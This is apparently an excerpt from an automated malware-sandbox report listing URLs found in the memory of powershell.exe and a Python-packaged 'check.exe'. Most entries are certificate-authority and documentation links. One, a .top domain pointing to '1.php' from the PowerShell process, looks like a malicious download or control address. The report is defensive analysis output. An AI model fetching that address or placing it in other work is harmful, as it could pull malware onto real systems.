00000004.00000003.2200573092.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2223763846.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2203572756.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2201279267.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2222127490.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2227016406.000001C184425000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: check.exe, 00000004.00000003.2224356100.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2197903575.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2223972781.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2224674718.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2225043556.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2198901562.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2202718129.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2223559467.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2222374412.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2222581886.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2226406918.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2196346858.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2223857971.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2208719982.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2200573092.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2223763846.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2203572756.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2201279267.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2222127490.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2227016406.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2223434926.000001C184424000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: check.exe, 00000005.00000003.2282239891.0000029FD9AB0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2738851397.0000029FD9F30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://curl.haxx.se/rfc/cookie_spec.html
Source: check.exe, 00000005.00000002.2739097916.0000029FDA118000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://goo.gl/zeJZl.
Source: check.exe, 00000005.00000003.2283352961.0000029FD97FB000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD97E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/
Source: check.exe, 00000005.00000002.2736668202.0000029FD947E000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2282278745.0000029FD99CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail/
Source: check.exe, 00000005.00000003.2282278745.0000029FD9993000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2319400919.0000029FD9993000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD9955000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2736668202.0000029FD93C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
Source: powershell.exe, 00000000.00000002.2198164900.0000022B11378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://hkinuxb3bz.top/1.php?s=527
Source: check.exe, 00000005.00000002.2738851397.0000029FD9F30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://mail.python.org/pipermail/python-dev/2012-June/120787.html.
Source: check.exe, 00000005.00000003.2313843486.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es
Source: check.exe, 00000005.00000003.2313843486.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es0
Source: check.exe, 00000005.00000003.2313843486.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.esSQ8
Source: check.exe, 00000004.00000003.2259191458.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2262892198.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2254482244.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2255442707.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2255169584.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2263045929.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2259702970.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2254329878.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2260368350.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2254679847.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2254830143.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2255084714.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2254947920.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2255302902.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2256951106.000001C18442C000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2259344289.000001C184425000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
Source: check.exe, 00000004.00000003.2259191458.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2262892198.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2254482244.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2255442707.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2255169584.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2263045929.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2259702970.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2254329878.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2260368350.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2254679847.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2256951106.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2254830143.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2255084714.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2254947920.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2255302902.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2256951106.000001C18442C000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2259344289.000001C184425000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
Source: check.exe, 00000004.00000003.2259191458.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2224356100.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2197903575.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2208243247.000001C184430000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2223972781.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2224674718.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2225043556.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2198901562.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2262892198.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2202718129.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2223559467.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2222374412.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2254482244.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2222581886.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2226406918.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2255442707.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2196346858.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2255169584.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2263045929.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2223857971.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2208719982.000001C184424000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
Source: check.exe, 00000004.00000003.2224356100.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2197903575.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2208243247.000001C184430000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2223972781.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2224674718.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2225043556.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2198901562.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2202718129.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2223559467.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2222374412.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2222581886.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2226406918.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2196346858.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2223857971.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2208719982.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2200573092.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2223763846.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2203572756.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2201279267.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2222127490.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2227016406.000001C184425000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
Source: check.exe, 00000004.00000003.2224356100.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2197903575.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2223972781.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2224674718.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2225043556.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2198901562.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2202718129.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2223559467.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2222374412.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2222581886.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2226406918.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2196346858.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2223857971.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2208719982.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2200573092.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2223763846.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2203572756.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2201279267.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2222127490.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2227016406.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2223434926.000001C184424000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
Source: check.exe, 00000004.00000003.2259191458.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2262892198.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2254482244.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2255442707.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2255169584.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2263045929.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2259702970.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2254329878.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2260368350.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2254679847.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2256951106.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2254830143.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2255084714.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2254947920.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2255302902.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2259344289.000001C184425000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
Source: powershell.exe, 00000000.00000002.2198164900.0000022B11378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: check.exe, 00000005.00000003.2319400919.0000029FD99CA000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2313843486.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD99C5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/
Source: check.exe, 00000005.00000002.2737420337.0000029FD98C2000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2319400919.0000029FD98C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/i
Source: powershell.exe, 00000000.00000002.2198164900.0000022B13053000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2198164900.0000022B11378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.2198164900.0000022B11151000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.2198164900.0000022B13053000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2198164900.0000022B11378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: check.exe, 00000005.00000002.2738633963.0000029FD9E10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
Source: check.exe, 00000005.00000003.2313843486.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
Source: check.exe, 00000005.00000003.2319400919.0000029FD99CA000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD99C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl
Source: check.exe, 00000005.00000003.2313843486.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
Source: check.exe, 00000005.00000003.2313843486.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm
Source: check.exe, 00000005.00000003.2313843486.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm0U
Source: check.exe, 00000005.00000003.2313843486.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es00
Source: check.exe, 00000005.00000002.2743333905.00007FF89DF9A000.00000002.00000001.01000000.00000024.sdmpString found in binary or memory: http://www.aiim.org/pdfa/ns/id/
Source: powershell.exe, 00000000.00000002.2198164900.0000022B11378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: check.exe, 00000005.00000002.2736668202.0000029FD947E000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2313843486.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/
Source: check.exe, 00000005.00000003.2313843486.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs//0
Source: check.exe, 00000005.00000002.2736668202.0000029FD947E000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2319400919.0000029FD99CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/0
Source: check.exe, 00000005.00000002.2743333905.00007FF89DF9A000.00000002.00000001.01000000.00000024.sdmpString found in binary or memory: http://www.color.org)
Source: check.exe, 00000004.00000003.2259191458.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2262892198.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2254482244.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2255442707.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2255169584.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2263045929.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2259702970.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2254329878.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2260368350.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2254679847.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2254830143.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2255084714.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2254947920.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2255302902.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2256951106.000001C18442C000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2259344289.000001C184425000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
Source: check.exe, 00000005.00000002.2739408419.0000029FDA190000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2313843486.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.firmaprofesional.com/cps0
Source: check.exe, 00000005.00000003.2283352961.0000029FD97FB000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD97E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
Source: check.exe, 00000005.00000003.2313843486.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps
Source: check.exe, 00000005.00000003.2313843486.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
Source: check.exe, 00000005.00000003.2282278745.0000029FD99CF000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2319400919.0000029FD99CA000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2282239891.0000029FD9AB0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD99C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wwwsearch.sf.net/):
Source: powershell.exe, 00000000.00000002.2198164900.0000022B11151000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.2198164900.0000022B11378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: check.exe, 00000005.00000002.2737420337.0000029FD97E0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2283352961.0000029FD986E000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2280765304.0000029FD986E000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2280765304.0000029FD97F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
Source: check.exe, 00000005.00000002.2736560958.0000029FD92C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/howto/mro.html.
Source: check.exe, 00000005.00000003.2276180826.0000029FD90AA000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2274508858.0000029FD90B5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2276668202.0000029FD90A0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2275314166.0000029FD90B2000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2736379235.0000029FD9080000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2736121313.0000029FD8E80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
Source: check.exe, 00000005.00000002.2736121313.0000029FD8E80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
Source: check.exe, 00000005.00000002.2736121313.0000029FD8F04000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
Source: check.exe, 00000005.00000002.2736121313.0000029FD8E80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
Source: check.exe, 00000005.00000002.2736121313.0000029FD8F04000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
Source: check.exe, 00000005.00000002.2736121313.0000029FD8E80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
Source: check.exe, 00000005.00000002.2736121313.0000029FD8E80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
Source: check.exe, 00000005.00000002.2736121313.0000029FD8E80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
Source: check.exe, 00000005.00000002.2735970218.0000029FD7678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
Source: check.exe, 00000005.00000003.2283651155.0000029FD9955000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2738181811.0000029FD9BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
Source: check.exe, 00000005.00000003.2319400919.0000029FD99CA000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2282278745.0000029FD9A01000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD99C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Ousret/charset_normalizer
Source: powershell.exe, 00000000.00000002.2198164900.0000022B11378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: check.exe, 00000005.00000002.2736379235.0000029FD9080000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
Source: check.exe, 00000005.00000002.2740761730.0000029FDA960000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/giampaolo/psutil/issues/875.
Source: check.exe, 00000005.00000002.2739097916.0000029FDA0E4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/psf/requests/pull/6710
Source: check.exe, 00000005.00000002.2736121313.0000029FD8F04000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
Source: check.exe, 00000005.00000002.2736379235.0000029FD9080000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
Source: check.exe, 00000005.00000002.2736379235.0000029FD9080000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
Source: check.exe, 00000005.00000003.2277413521.0000029FD9533000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2736668202.0000029FD947E000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2279817570.0000029FD94A3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2277497052.0000029FD949C000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2281256649.0000029FD94B0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2277898979.0000029FD9477000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/issues/86361.
